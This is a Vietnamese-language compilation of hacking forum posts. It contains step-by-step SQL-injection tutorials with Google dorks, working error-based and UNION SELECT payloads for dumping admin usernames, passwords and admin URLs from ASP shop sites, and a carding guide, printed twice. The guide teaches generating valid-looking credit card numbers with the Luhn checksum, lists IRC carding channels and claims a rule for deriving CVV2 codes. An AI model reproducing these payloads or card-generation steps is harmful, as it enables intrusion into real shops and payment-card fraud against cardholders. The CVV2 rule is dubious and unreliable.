No products match your search
Oh vậy là table 'ver_Faq' ko có column nào mà tên của nó có chứa chữ "pass" .Đến đây chắc bạn biết làm gì tiếp, ta cứ search các table khác, table nào có nó sẽ cho ra kết quả như sau :
TríchMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Sau khi đã có username và password việc còn lại là tìm link admin
Ta biết column fieldvalue và fieldname chứa link admin
Column fieldvalue và fieldname thường nằm trong table configuration
Nhưng nhiều khi bạn đã lấy được tất cả table của shop nhưng vẫn không thấy table configuration , đó là vì table này đã bị rename , lúc này buộc bạn phải sử dụng tiếp từ khoá like để search column filedvalue . Cái này tôi không nói thêm nữa bạn. cứ áp dụng theo hướng dẫn ở trên.
Để lấy link admin bạn dùng câu truy vấn như sau :
Code:
and 1=convert(int,(select top 1 fieldname%2b'/'%2bfieldvalue from configuration where fieldname='xadminpage'))--sp_password
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'xadminpage/5h0padm1n.asp' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
url:http://danviet.biz/forum/showthread.php?t=776
Căn bản về Credit Card
Căn bản về Credit Card
Chào các bạn !
Trong thời gian qua, tại một số Forum, chúng ta thường nghe nói và bàn luân nhiều đến vấn đề Credit Card. Tôi cũng có theo dõi và cũng có tìm hiểu nghiên cứu chút ít về nó, hy vọng những gì tôi trình bày bên dưới sẽ giúp cho các bạn hiểu được vấn đề này rõ ràng hơn.
Hôm nay tôi xin “mạn phép” được trình bày một hiểu biết của tôi về vấn đề Credit Card.
Bài viết này chỉ có mục đích tham khảo, tăng thêm sự hiểu biết cũng như tính bảo mật của Card, do vậy chúng tôi hoàn toàn không chịu trách nhiệm trước pháp luật cũng như những ai cố tình sủ dụng bài viết cho mục đích khác, làm gây nguy hại đến vật chất và tài sản của người khác.
oo-=0=-oo
Một Number Card thường gồm có 16 chữ số, có loại có 13 chữ số.
Trong đó, 4 chữ số đầu tiên thường quy định và là dấu hiệu nhận dạng bởi các tên của ngân hàng phát hành Card đó
3xxx xxxx xxxx xxxx: Ameriacan Express Card
4xxx xxxx xxxx xxxx: Visa Card
5xxx xxxx xxxx xxxx: Master Card
6xxx xxxx xxxx xxxx: Discover Card
Chữ số đầu tiên thường được dùng để nhận biết đó là Card của loại nào.
3 = Ame
4 = Visa
5 = Master
6 = Discover
3 chữ số tiếp theo sau là tên nhận dạng ID của ngân hàng.
Nói chung, khi ta nhìn vào 4 ký tự số đầu tiên ta sẽ biết đó là thể loại nào: American Express Card, Visa Card, Master Card hay Discover Card.
AMERICAN EXPRESS
3XXX
3728
3713
3731 - AmEx Green
3737 - AmEx Optima
3782 - AmEx - Small Corporate Card
....
VISA CARD
4XXX
4013 - Citibank
4019 - Bank of America
4024 - Bank of America
4027 - Rockwell Federal Credit Union
4032 - Household Bank
....
MASTER CARD
5XXX
5100 - Western States Bankcard Association
5110 - Universal Travel Voucher
5120 - Western States Bankcard Association
5130 - Eurocard France
....
DISCOVER CARD
6XXX
6013 - MBNA
....
Làm sao để kiểm tra số Card là đúng. Nhờ đâu mà các chương trình kiểm tra Card có thể biết được đó là số đúng của Card.
Câu trả lời đó là tất cả đều phụ thuộc vào con số cuối cùng của Card. Đó là con số mà những chương trình gọi là số tổng kiểm tra (checksum), con số này sẽ quyết định dãy số của Card là số đúng hay sai.
Nếu con số cuối cùng là đúng và phù hợp thì nó là một dãy số Number Card đúng, chúng ta có thể dùng nó.
Nếu số đó là một con số sai thì coi như Number Card đó sai.
Tuy nhiên, nếu chúng ta thông minh và để ý một chút thì ta vẫn có thể tìm được một Number Card đúng sau 9 lần thử khác nhau. Vì ta có thể thay đổi con số cuối cùng thành 1 trong 9 lựa chọn khác:
Ví dụ: 3xxx xxxx xxxx xxx5 : dãy số đúng ta cần tìm.
Ta lần lượt thay con số cuối cùng như sau:
3xxx xxxx xxxx xxx0
3xxx xxxx xxxx xxx1
3xxx xxxx xxxx xxx2
3xxx xxxx xxxx xxx3
3xxx xxxx xxxx xxx4
3xxx xxxx xxxx xxx5 ===> đây là kết quả đúng và con số 5 là số cần tìm.
3xxx xxxx xxxx xxx6
3xxx xxxx xxxx xxx7
3xxx xxxx xxxx xxx8
3xxx xxxx xxxx xxx9
Như vậy tới đây là tạm thời có thể hiểu cách tìm (tính toán) sao cho có một Number Card đúng.
Đây là cách tính thủ công, cách tính “mẹo”. Quá dễ phảI không các bạn.
Như vậy các bạn chỉ cần biết 4 con số đầu tiên để làm “gốc”, 4 con số này để chương trình biết nó là Master Card hay Visa Card … và đó chính là tên của ngân hàng. Sau đó các bạn có thể tự bịa ra 1 dãy số bất kỳ nào đó.
Thay đổi con số “cuối cùng” trong khoảng từ 0..9 để tìm ra con số đúng nhất và như vậy bạn đã có 1 Number Card hợp lệ.
Cách tính toán và tìm ra quy luật của Number Card.
Như đã nói ở trên, chúng ta chỉ cần biết 4 con số đầu tiên mà thôi. Đó là 4 con số quy định tên ID của ngân hàng. Chúng ta chỉ cần biết 4 con số đó là có thể tự tạo ra cho mình một số lượng Number Card dùng thoải mái cho đến ngày vào Prison chơi
Sau đây tôi sẽ cùng các bạn đi tìm cách tính toán một cách khoa học và chính xác hơn chứ không phảI ngồi mò mò, rồi phảI thay đổi con số cuối cho phù hợp.
Ví dụ: 5204 xxxx xxxx xxxY
5204 = Security Pacific : đây là Master Card do ngân hàng Security Pacific phát hành.
xxxx xxxx xxx: là một dãy số ngẫu nhiên, bất kỳ nào đó.
Y : đây là con số cần tìm để Number Card là hợp lệ
Sau khi biết 4 số đầu tiên, ta có thể lấy ngẫu nhiên và bất kỳ từ số 0 đến số 9 của mười một ký tự số đại diện cho chữ X.
Giả sử tôi lấy là
5204 1234 5678 901Y
5204 xxxx xxxx xxxY
Trong đó ta chia ra làm 2 dãy số chẵn và dãy số lẽ.
a. Dãy số 5 0 1 3 5 7 9 1 ta gọi là dãy số lẽ.
b. Dãy số 2 4 2 4 6 8 0 Y ta gọi là dãy số chẫn.
Lấy từng chữ số trong dãy số lẽ “nhân” vớI 2
5 x 2 = 10
0 x 2 = 0
1 x 2 = 2
3 x 2 = 6
5 x 2 = 10
7 x 2 = 14
9 x 2 = 18
1 x 2 = 2
Nếu kết quả nhân của từng số nào lớn hơn 9, thì ta lấy số đó trừ đi 9.
5 x 2 = 10 - 9 = 1
0 x 2 = 0 = 0
1 x 2 = 2 = 2
3 x 2 = 6 = 6
5 x 2 = 10 = 1
7 x 2 = 14 - 9 = 5
9 x 2 = 18 - 9 = 9
1 x 2 = 2 = 2
Cộng các kết quả mớI tình được lai vớI nhau:
1 + 0 + 2 + 6 + 1 + 5 + 9 + 2 = 26 ===èSố A
Cộng các chữ số của dãy số chẵn lại vớI nhau, vì Y là số cần tìm và ta chưa biết nên không cần cộng
Dãy số 2 4 2 4 6 8 0 Y là dãy số chẵn đã nói ở trên
2 + 4 + 2 + 4 + 6 + 8 + 0 = 26 ===è Số B
Lấy A + B
26 + 26 = 52
TớI đây ta lấy số cuối cùng là 2 cộng thêm 8 để làm tròn số thành 10
Ví dụ:
+ số cuối cùng là 3 thì cộng thêm 7 để thành 10
+ số cuối cùng là 4 thì cộng thêm 6 để thành 10
+ số cuối cùng là 5 thì cộng thêm 5 để thành 10
+ số cuối cùng là 6 thì cộng thêm 4 để thành 10
+ số cuối cùng là 7 thì cộng thêm 3 để thành 10
+ số cuối cùng là 8 thì cộng thêm 2 để thành 10
+ số cuối cùng là 9 thì cộng thêm 1 để thành 10
+ số cuối cùng là 0 thì cộng thêm 0 để thành 0 =è chú ý chỗ này
+ số cuối cùng là 1 thì cộng thêm 9 để thành 10
Nói chung là cộng thêm số nào đó để nó thành số chẵn là 10
Vậy cái số bí mật cần tìm chính là con số được cộng thêm vào.
Trong ví dụ này, đó chính là con số 8.
Vậy số Y cần tìm là 8
Số Number Card là 5204 1234 5678 9018
Cách tìm số Veryfind Number hay còn gọI là CVV2
Đây là một dãy số gồm 3 số (American Express) hay 4 số (Visa Card, Master Card và Discover Card). Những số này có thể tạm hiểu là những con số bí mật, nó giống như câu trả lời cho cây hỏi khi bạn quên Pass của mail Yahoo hay Hotmail vậy đó. Những con số này được IN trên thẻ tín dụng, chúng ta đâu có thẻ này đâu mà có thể biết được những con số này là gì.
Tuy nhiên tại một Server chat ở mIRC, người ta có thể Check và đưa ra kết quả cho bạn về CVV2 này. Tôi đã kiểm chứng rất nhiều kết quả CVV2 có được do họ Check thì chưa bao giờ thành công. Tôi cũng đã chat vớI Admin, FD…nói chung là những người làm ra con BOT để check CVV2 thì chính họ cũng xác nhận là “không thành công”, họ nói rằng lúc được, lúc không, chính họ cũng không biết …họ vẫn đang tiếp tục nghiên cứu vấn đề này…..hic hic hic
server: irc.dal.net
port 6667
room: #thacc, #thecc, #!chk, …
Cách này tôi không dám đảm bảo tính chính xác của nó vì chính các Admin của #room đã trả lờI như vậy rồI mà.
Sau một thờI gian dài nghiên cứu cách tính CVV2 của họ, cuối cùng tôi cũng thành công là tìm ra “quy luật” tính CVV2 của những con BOTs trong #thacc, #thecc ….
Khi bạn vào những #room đó, bạn có thể gõ lệnh
!command {gõ enter} để biết những lệnh mà con BOTs của #room đó sẽ làm việc như thế nào.
!cvv2 numbercard expdate {gõ enter} (nhớ có khoảng trắng)
!cvv2 số_card ngày_hết_hạn {gõ enter} (nhớ có khoảng trắng)
!cvv2 3456354511117432 0104 {gõ enter}
!cvv2 4017140180542018 0702 {gõ enter}
!cvv2 5459180008179595 0604 {gõ enter}
!cvv2 6013559110422697 1003 {gõ enter}
Lúc đó các bạn sẽ nhận được câu trả lờI là:
3456354511117432 is Amex, cvv2: 5516
4017140180542018 is Visa, cvv2: 142
5459180008179595 is MasterCard, cvv2: 076
6013559110422697 is Discover, cvv2: 122
Vậy thì họ đã tính CVV2 như thế nào ?
+ ĐốI vớI Amex thì dùng những con số nằm ở thứ tự như sau: 6,8,12,3+1
3456354511117432
3456354511117432
3456354511117432
34(5+1)6354511117432
Con số cuối cùng của CVV2 thường cộng thêm 1
+ ĐốI vớI Visa, Master và Discover thì áp dụng cùng 1 quy luật: 8,12,3+1
4017140180542018
4017140180542018
40(1+1)7140180542018
==è CVV2 là 142
Chú ý: Giả sử con số thứ 3 của dãy Card là số 9
4090 xxxx xxxx xxxx : CVV2 là xx1
4094 xxxx xxxx xxxx : CVV2 là xx1
4897 xxxx xxxx xxxx : CVV2 là xx1
5191 xxxx xxxx xxxx : CVV2 là xx1
ví dụ:
4897 1234 5678 9012 : CVV2 là 481
Tức là ta không cần phải cộng thêm 1 ở con số hàng thứ 3 như những trường hợp khác mà ta “gán” cho nó bằng 1
Một số vấn đề khác của Credit Card.
a. 4271-382A-xxxx-xxxx - Citibank Preferred Visa
Đây là Card do ngân hàng Citibank Preferred Visa phát hành, Card này được nhận dạng qua 7 con số đầu tiên chứ không phảI 4 số như các loại khác.
b. Gold Card - Diners Club - Card NoLimit
30xx xxxx xxxx xxxx - Diners Club
31xx xxxx xxxx xxxx - Diners Club
35xx xxxx xxxx xxxx - Diners Club
36xx xxxx xxxx xxxx - Diners Club
….
Những loại Card này có Ưu điểm đó là No Limit, tức là nó không hạn chế số tiền bạn muốn chi xài trong một tháng là bao nhiêu cả. Những Card khác thì tuỳ ngư ời chủ sở hữu Card quy định, có thể là 500$/1tháng, 1000$/1tháng hay 2000$/1tháng …
Những Gold Card, Diners Club này thường là của những ông chủ giàu có. Và những Card này thư ờng là của Amex. Card Amex thường là Card NoLimit
c. Card 4063 xxxx xxxx xxxx
Đây là Card mới phát hành và Limit mỗI tháng của nó là 2000$
Còn nhiều vấn đề khác cần phảI quan tâm và nghiên cứu nũa, nhưng trình độ có hạn cũng như hiện tại tôi không có Computer cũng như điều kiện tài chính nên không thể nghiên cứu hết các vấn đề khác như:
a. Tính toán ngày hết hạn Expdate
b. Kiểm tra Card có bị Decline (hết giá trị hay bị clock) hay vẫn còn Valid (còn dùng)
c. Tìm hiểu và nghiên cứu cách tính CVV2 thay cho cách tính của BOTs ở trên.
d. Tôi chưa kiểm chứng và làm thí nghiệm nhiều trên loại Card 13 chữ số.
e. Các bạn nào giỏI lập trình có thể dựa vào những ý tưởng đó để viết một chương
trình keygen và tính toán Card.
url:http://danviet.biz/forum/showthread.php?t=728
Trong thời gian qua, tại một số Forum, chúng ta thường nghe nói và bàn luân nhiều đến vấn đề Credit Card. Tôi cũng có theo dõi và cũng có tìm hiểu nghiên cứu chút ít về nó, hy vọng những gì tôi trình bày bên dưới sẽ giúp cho các bạn hiểu được vấn đề này rõ ràng hơn.
Hôm nay tôi xin “mạn phép” được trình bày một hiểu biết của tôi về vấn đề Credit Card.
Bài viết này chỉ có mục đích tham khảo, tăng thêm sự hiểu biết cũng như tính bảo mật của Card, do vậy chúng tôi hoàn toàn không chịu trách nhiệm trước pháp luật cũng như những ai cố tình sủ dụng bài viết cho mục đích khác, làm gây nguy hại đến vật chất và tài sản của người khác.
oo-=0=-oo
Một Number Card thường gồm có 16 chữ số, có loại có 13 chữ số.
Trong đó, 4 chữ số đầu tiên thường quy định và là dấu hiệu nhận dạng bởi các tên của ngân hàng phát hành Card đó
3xxx xxxx xxxx xxxx: Ameriacan Express Card
4xxx xxxx xxxx xxxx: Visa Card
5xxx xxxx xxxx xxxx: Master Card
6xxx xxxx xxxx xxxx: Discover Card
Chữ số đầu tiên thường được dùng để nhận biết đó là Card của loại nào.
3 = Ame
4 = Visa
5 = Master
6 = Discover
3 chữ số tiếp theo sau là tên nhận dạng ID của ngân hàng.
Nói chung, khi ta nhìn vào 4 ký tự số đầu tiên ta sẽ biết đó là thể loại nào: American Express Card, Visa Card, Master Card hay Discover Card.
AMERICAN EXPRESS
3XXX
3728
3713
3731 - AmEx Green
3737 - AmEx Optima
3782 - AmEx - Small Corporate Card
....
VISA CARD
4XXX
4013 - Citibank
4019 - Bank of America
4024 - Bank of America
4027 - Rockwell Federal Credit Union
4032 - Household Bank
....
MASTER CARD
5XXX
5100 - Western States Bankcard Association
5110 - Universal Travel Voucher
5120 - Western States Bankcard Association
5130 - Eurocard France
....
DISCOVER CARD
6XXX
6013 - MBNA
....
Làm sao để kiểm tra số Card là đúng. Nhờ đâu mà các chương trình kiểm tra Card có thể biết được đó là số đúng của Card.
Câu trả lời đó là tất cả đều phụ thuộc vào con số cuối cùng của Card. Đó là con số mà những chương trình gọi là số tổng kiểm tra (checksum), con số này sẽ quyết định dãy số của Card là số đúng hay sai.
Nếu con số cuối cùng là đúng và phù hợp thì nó là một dãy số Number Card đúng, chúng ta có thể dùng nó.
Nếu số đó là một con số sai thì coi như Number Card đó sai.
Tuy nhiên, nếu chúng ta thông minh và để ý một chút thì ta vẫn có thể tìm được một Number Card đúng sau 9 lần thử khác nhau. Vì ta có thể thay đổi con số cuối cùng thành 1 trong 9 lựa chọn khác:
Ví dụ: 3xxx xxxx xxxx xxx5 : dãy số đúng ta cần tìm.
Ta lần lượt thay con số cuối cùng như sau:
3xxx xxxx xxxx xxx0
3xxx xxxx xxxx xxx1
3xxx xxxx xxxx xxx2
3xxx xxxx xxxx xxx3
3xxx xxxx xxxx xxx4
3xxx xxxx xxxx xxx5 ===> đây là kết quả đúng và con số 5 là số cần tìm.
3xxx xxxx xxxx xxx6
3xxx xxxx xxxx xxx7
3xxx xxxx xxxx xxx8
3xxx xxxx xxxx xxx9
Như vậy tới đây là tạm thời có thể hiểu cách tìm (tính toán) sao cho có một Number Card đúng.
Đây là cách tính thủ công, cách tính “mẹo”. Quá dễ phảI không các bạn.
Như vậy các bạn chỉ cần biết 4 con số đầu tiên để làm “gốc”, 4 con số này để chương trình biết nó là Master Card hay Visa Card … và đó chính là tên của ngân hàng. Sau đó các bạn có thể tự bịa ra 1 dãy số bất kỳ nào đó.
Thay đổi con số “cuối cùng” trong khoảng từ 0..9 để tìm ra con số đúng nhất và như vậy bạn đã có 1 Number Card hợp lệ.
Cách tính toán và tìm ra quy luật của Number Card.
Như đã nói ở trên, chúng ta chỉ cần biết 4 con số đầu tiên mà thôi. Đó là 4 con số quy định tên ID của ngân hàng. Chúng ta chỉ cần biết 4 con số đó là có thể tự tạo ra cho mình một số lượng Number Card dùng thoải mái cho đến ngày vào Prison chơi
Sau đây tôi sẽ cùng các bạn đi tìm cách tính toán một cách khoa học và chính xác hơn chứ không phảI ngồi mò mò, rồi phảI thay đổi con số cuối cho phù hợp.
Ví dụ: 5204 xxxx xxxx xxxY
5204 = Security Pacific : đây là Master Card do ngân hàng Security Pacific phát hành.
xxxx xxxx xxx: là một dãy số ngẫu nhiên, bất kỳ nào đó.
Y : đây là con số cần tìm để Number Card là hợp lệ
Sau khi biết 4 số đầu tiên, ta có thể lấy ngẫu nhiên và bất kỳ từ số 0 đến số 9 của mười một ký tự số đại diện cho chữ X.
Giả sử tôi lấy là
5204 1234 5678 901Y
5204 xxxx xxxx xxxY
Trong đó ta chia ra làm 2 dãy số chẵn và dãy số lẽ.
a. Dãy số 5 0 1 3 5 7 9 1 ta gọi là dãy số lẽ.
b. Dãy số 2 4 2 4 6 8 0 Y ta gọi là dãy số chẫn.
Lấy từng chữ số trong dãy số lẽ “nhân” vớI 2
5 x 2 = 10
0 x 2 = 0
1 x 2 = 2
3 x 2 = 6
5 x 2 = 10
7 x 2 = 14
9 x 2 = 18
1 x 2 = 2
Nếu kết quả nhân của từng số nào lớn hơn 9, thì ta lấy số đó trừ đi 9.
5 x 2 = 10 - 9 = 1
0 x 2 = 0 = 0
1 x 2 = 2 = 2
3 x 2 = 6 = 6
5 x 2 = 10 = 1
7 x 2 = 14 - 9 = 5
9 x 2 = 18 - 9 = 9
1 x 2 = 2 = 2
Cộng các kết quả mớI tình được lai vớI nhau:
1 + 0 + 2 + 6 + 1 + 5 + 9 + 2 = 26 ===èSố A
Cộng các chữ số của dãy số chẵn lại vớI nhau, vì Y là số cần tìm và ta chưa biết nên không cần cộng
Dãy số 2 4 2 4 6 8 0 Y là dãy số chẵn đã nói ở trên
2 + 4 + 2 + 4 + 6 + 8 + 0 = 26 ===è Số B
Lấy A + B
26 + 26 = 52
TớI đây ta lấy số cuối cùng là 2 cộng thêm 8 để làm tròn số thành 10
Ví dụ:
+ số cuối cùng là 3 thì cộng thêm 7 để thành 10
+ số cuối cùng là 4 thì cộng thêm 6 để thành 10
+ số cuối cùng là 5 thì cộng thêm 5 để thành 10
+ số cuối cùng là 6 thì cộng thêm 4 để thành 10
+ số cuối cùng là 7 thì cộng thêm 3 để thành 10
+ số cuối cùng là 8 thì cộng thêm 2 để thành 10
+ số cuối cùng là 9 thì cộng thêm 1 để thành 10
+ số cuối cùng là 0 thì cộng thêm 0 để thành 0 =è chú ý chỗ này
+ số cuối cùng là 1 thì cộng thêm 9 để thành 10
Nói chung là cộng thêm số nào đó để nó thành số chẵn là 10
Vậy cái số bí mật cần tìm chính là con số được cộng thêm vào.
Trong ví dụ này, đó chính là con số 8.
Vậy số Y cần tìm là 8
Số Number Card là 5204 1234 5678 9018
Cách tìm số Veryfind Number hay còn gọI là CVV2
Đây là một dãy số gồm 3 số (American Express) hay 4 số (Visa Card, Master Card và Discover Card). Những số này có thể tạm hiểu là những con số bí mật, nó giống như câu trả lời cho cây hỏi khi bạn quên Pass của mail Yahoo hay Hotmail vậy đó. Những con số này được IN trên thẻ tín dụng, chúng ta đâu có thẻ này đâu mà có thể biết được những con số này là gì.
Tuy nhiên tại một Server chat ở mIRC, người ta có thể Check và đưa ra kết quả cho bạn về CVV2 này. Tôi đã kiểm chứng rất nhiều kết quả CVV2 có được do họ Check thì chưa bao giờ thành công. Tôi cũng đã chat vớI Admin, FD…nói chung là những người làm ra con BOT để check CVV2 thì chính họ cũng xác nhận là “không thành công”, họ nói rằng lúc được, lúc không, chính họ cũng không biết …họ vẫn đang tiếp tục nghiên cứu vấn đề này…..hic hic hic
server: irc.dal.net
port 6667
room: #thacc, #thecc, #!chk, …
Cách này tôi không dám đảm bảo tính chính xác của nó vì chính các Admin của #room đã trả lờI như vậy rồI mà.
Sau một thờI gian dài nghiên cứu cách tính CVV2 của họ, cuối cùng tôi cũng thành công là tìm ra “quy luật” tính CVV2 của những con BOTs trong #thacc, #thecc ….
Khi bạn vào những #room đó, bạn có thể gõ lệnh
!command {gõ enter} để biết những lệnh mà con BOTs của #room đó sẽ làm việc như thế nào.
!cvv2 numbercard expdate {gõ enter} (nhớ có khoảng trắng)
!cvv2 số_card ngày_hết_hạn {gõ enter} (nhớ có khoảng trắng)
!cvv2 3456354511117432 0104 {gõ enter}
!cvv2 4017140180542018 0702 {gõ enter}
!cvv2 5459180008179595 0604 {gõ enter}
!cvv2 6013559110422697 1003 {gõ enter}
Lúc đó các bạn sẽ nhận được câu trả lờI là:
3456354511117432 is Amex, cvv2: 5516
4017140180542018 is Visa, cvv2: 142
5459180008179595 is MasterCard, cvv2: 076
6013559110422697 is Discover, cvv2: 122
Vậy thì họ đã tính CVV2 như thế nào ?
+ ĐốI vớI Amex thì dùng những con số nằm ở thứ tự như sau: 6,8,12,3+1
3456354511117432
3456354511117432
3456354511117432
34(5+1)6354511117432
Con số cuối cùng của CVV2 thường cộng thêm 1
+ ĐốI vớI Visa, Master và Discover thì áp dụng cùng 1 quy luật: 8,12,3+1
4017140180542018
4017140180542018
40(1+1)7140180542018
==è CVV2 là 142
Chú ý: Giả sử con số thứ 3 của dãy Card là số 9
4090 xxxx xxxx xxxx : CVV2 là xx1
4094 xxxx xxxx xxxx : CVV2 là xx1
4897 xxxx xxxx xxxx : CVV2 là xx1
5191 xxxx xxxx xxxx : CVV2 là xx1
ví dụ:
4897 1234 5678 9012 : CVV2 là 481
Tức là ta không cần phải cộng thêm 1 ở con số hàng thứ 3 như những trường hợp khác mà ta “gán” cho nó bằng 1
Một số vấn đề khác của Credit Card.
a. 4271-382A-xxxx-xxxx - Citibank Preferred Visa
Đây là Card do ngân hàng Citibank Preferred Visa phát hành, Card này được nhận dạng qua 7 con số đầu tiên chứ không phảI 4 số như các loại khác.
b. Gold Card - Diners Club - Card NoLimit
30xx xxxx xxxx xxxx - Diners Club
31xx xxxx xxxx xxxx - Diners Club
35xx xxxx xxxx xxxx - Diners Club
36xx xxxx xxxx xxxx - Diners Club
….
Những loại Card này có Ưu điểm đó là No Limit, tức là nó không hạn chế số tiền bạn muốn chi xài trong một tháng là bao nhiêu cả. Những Card khác thì tuỳ ngư ời chủ sở hữu Card quy định, có thể là 500$/1tháng, 1000$/1tháng hay 2000$/1tháng …
Những Gold Card, Diners Club này thường là của những ông chủ giàu có. Và những Card này thư ờng là của Amex. Card Amex thường là Card NoLimit
c. Card 4063 xxxx xxxx xxxx
Đây là Card mới phát hành và Limit mỗI tháng của nó là 2000$
Còn nhiều vấn đề khác cần phảI quan tâm và nghiên cứu nũa, nhưng trình độ có hạn cũng như hiện tại tôi không có Computer cũng như điều kiện tài chính nên không thể nghiên cứu hết các vấn đề khác như:
a. Tính toán ngày hết hạn Expdate
b. Kiểm tra Card có bị Decline (hết giá trị hay bị clock) hay vẫn còn Valid (còn dùng)
c. Tìm hiểu và nghiên cứu cách tính CVV2 thay cho cách tính của BOTs ở trên.
d. Tôi chưa kiểm chứng và làm thí nghiệm nhiều trên loại Card 13 chữ số.
e. Các bạn nào giỏI lập trình có thể dựa vào những ý tưởng đó để viết một chương
trình keygen và tính toán Card.
url:http://danviet.biz/forum/showthread.php?t=728
hack Shop dựa vào lỗi SQL id=?' cat=?'
hack Shop dựa vào lỗi SQL id=?' cat=?'
1. Công cụ tìm kiếm site lỗi: Google
2. Từ khóa tìm kiếm:
*
allinurl:"shopdisplayproducts.asp?id=
*
allinurl:"shopdisplayproducts.asp?id=1
*
allinurl:"shopdisplayproducts.asp?id=2
*
allinurl:".com/shopdisplayproducts.asp?id=
*
allinurl:".net/shopdisplayproducts.asp?id=
*
.asp?=catalogid=
*
.asp?cid=
*
alliurl: shop$.asp?$=
*
shopexd.asp?
*
shopreviewlist.asp?id=1
3. Thông thường ta thực hiện 3 giai đoạn sau:
* Tìm UserName và PassAdmin
* Tìm Link Admin
* Tìm Pass 2 nếu có
Tìm Shop lỗi
Thêm dấu (') vào sau: http://www.victim.com/shoping/shopdisplayp...s.asp?id=5'
Báo lỗi :
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order
By specialOffer DESC, cname'
./shopping/shop$db.asp, line 657
Nếu không thấy lỗi, thay id bằng cat: http://www.victim.com/shoping/shopdisplayp....asp?cat=5'
Có lỗi rùi :
Microsoft JET database Engine error '80040e014'
Syntax error in query expression 'ccintcatalogid=p.catalogid and cc.intcategory=c.categoryid and c.catdescription like'5%'
and hide=0 order by specialoffer DESC, cname'
./shopping/shop$db.asp, line 564
Chú ý khi về 2 trường hợp trên : (Quan trọng)
* Nếu lỗi là id trong các truy vấn bên dưới không có dấu (') theo sau số id
* Nếu lỗi là cat thì cần có thêm dấu (') theo sau trong các truy vấn bên dưới
Đối với lỗi do id: không có dấu (') trong các truy vấn
//////////Tìm username và pass Admin://////////
Thêm đoạn code này vào sau:
%20union select 1 from tbluser'
Thông thường ta thêm: (có lẽ các bạn đã hiểu là vì sao nên không nói dài dòng nữa)
%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser'
%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47 from tbluser'
Thêm cho đến khi nào xuất một trang bình thường và không còn báo lỗi nữa. Trên trang xuất hiện mấy con số lạ. Thông thường là số 3, 4, 22, 18
Ta thay con số 3 bằng đoạn mã sau để lấy user và pass admin:
fldusername%2b'/'%2bfldpassword
Ta có được:
%20union select 1,2,fldusername%2b'/'%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from tbluser'
%20union select 1,2,fldusername%2b'/'%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47 from tbluser'
Số 3 bây giờ sẽ là: usernameadmin/passadmin
Ví dụ như : kakaka/maiyeuem
//////////Tìm link admin ://////////
Link mặc định là shopadmin.asp, shopadmin1.asp. Nếu không được thì đành tự kiếm !
Nó nằm tại bảng configuration. Vẫn giữ nguyên số cột mà bạn đã khai thác được, thay column đầu bằng:
fieldname='xadminpage'
Thay column lỗi muốn hiển thị bằng:
fieldvalue (ở đây là số 3)
Ta được như sau (một trong hai):
%20union select fieldname='xadminpage',2,fieldvalue,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37 from configuration'
%20union select fieldname='xadminpage',2,fieldvalue,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47 from configuration'
Chú ý: Có thể thay giá trị fieldvalue vào số 3, 4, hay 22 gì tùy bạn. Không bắc buộc là số 3 ! Theo ví dụ này mình cho vô số 3 ^^
1 là bạn gặp 1 trang trên có mấy con số như : Page 1 of 10
Hãy cố gắng tìm trong 10 trang đó sẽ có 1 trang chứa link admin. Bạn tìm được các trang có đuôi dạng *.asp
2 là bạn gặp thông báo lỗi:
The Microsoft Jet database engine cannot find the input table or query 'configuration'. Make sure it exists and that its name is spelled correctly.
Hic...victim đã xóa mất bảng config và hết lấy link admin !
//////////Tìm Pass 2://////////
Nếu bạn có link admin, nhưng shop này nó đòi cái pass 2 nữa ! Quỹ quái thật
Không có gì khó, nhưng bạn phải xem trang đó có bị lỗi tại page: shopexd.asp hay không, nếu không kiếm pass 2 ngay !
Dùng đoạn code này:
shopexd.asp?id=1%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,fieldvalue,28,29,30,31,32,33,34 ,35,36,37 from configuration where field name='xadminpage'
Hoặc:
shopexd.asp?id=1%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,fieldvalue ,28,29,30,31,32,33,34,35,36,37 from configuration'
Giả sử tại page này column 20 bị lỗi
Dùng code như khi kiếm link admin tại chỗ này:
%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,fieldvalue,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37 from configuration'
Rồi, nếu ok nó sẽ sổ ra mã nguồn asp của trang admin, và bạn sẽ nhìn thấy pass 2 tại dòng lênh: Const SecondPassword="pass 2"
Tiếp, nếu bạn muốn tìm link admin tại page này thì phải dùng code sau:
%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,left(fieldvalue,9),21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37 from configuration'
Nếu nó vẫn ra mã nguồn, thì nghĩa là số kí tự của link admin nhỏ hơn 9 hoặc bằng 9, bạn thay 9 bằng số 7.
-> giả sử nó sẽ hiện ra thế này: shoa.as Nhìn thế này thì đủ biết link admin là gì rồi.
